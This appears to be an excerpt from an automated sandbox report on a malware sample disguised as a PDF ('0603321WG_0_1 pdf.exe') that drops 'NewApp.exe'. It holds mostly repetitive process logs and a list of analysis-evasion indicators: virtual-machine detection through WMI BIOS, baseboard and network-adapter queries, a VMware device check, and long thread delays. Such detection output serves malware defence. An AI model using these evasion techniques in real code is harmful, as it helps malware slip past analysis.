                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWindow / User API: threadDelayed 480
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWindow / User API: threadDelayed 2830
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWindow / User API: threadDelayed 1055
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWindow / User API: threadDelayed 8763
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 1055
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 2255
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 1512
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 1798
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 1776
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 3515
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 6313
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 7008Thread sleep count: 480 > 30
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe TID: 7008Thread sleep count: 2830 > 30
